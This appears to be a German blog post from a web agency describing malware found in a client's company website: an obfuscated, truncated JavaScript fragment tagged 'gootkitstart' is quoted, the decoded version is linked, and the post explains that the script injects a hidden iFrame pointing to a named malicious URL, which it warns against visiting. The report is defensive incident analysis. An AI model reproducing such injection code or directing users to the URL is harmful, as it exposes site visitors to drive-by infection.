Heute Nachmittag erreichte uns ein Hilfeschrei von einem unserer Kunden.

Der Desktopscanner hatte zu Recht die (nicht von uns stammende) firmeneigene Webseite als verdächtig gemeldet.

Lustigerweise hat bei der darauf folgenden Verifizierung des Alarms durch uns genau einer der einschlägigen Online-Scanner eine Bedrohung oder Infizierung erkannt – alle anderen stuften die Seite als sicher ein. In diversen JavaScript-Skripten auf der Seite präsentierte sich jedoch Code im Stile von:

/*gootkitstart*/i=0;try{grbregd=prototype;}catch(z){h=”ha”+”rCode”;f=[10,17.5,14,8.5,17,11.5,14.5,14,-25,14,9.5,19,17,0,7.5,14,9,14.5,13.5,-2,17.5,13.5,8,9.5,16,-21,-20.5,20.5

und so weiter.

 

Dies liess uns nun doch aufhorchen. Der Codeteil wurde so rasch wie möglich entfernt, jedoch zur Analyse auf github gespeichert. Jonas Baumann hat dann kurzerhand den “Algorithmus” geknackt und mit dem Klartext geantwortet:

https://gist.github.com/2874683

Wie so üblich bei solchen Schad-Skripten, wird ein iFrame nachträglich in die Seite eingefügt – genauer mit zwei Sekunden Verzögerung.

Der Inhalt des iFrames jedoch bleibt mir schleierhaft, bei der aufgerufenen Seite (welches übrigens immer dieselbe ist: http://violet-jftqsegsse.dns-stuff.com/go.php?sid=mix -> AUSDRÜCKLICHE Warnung vor dem Besuch der Seite!!) kommt ständig einen 404-Fehler.

Hat jemand bereits ähnliche Beobachtungen gemacht?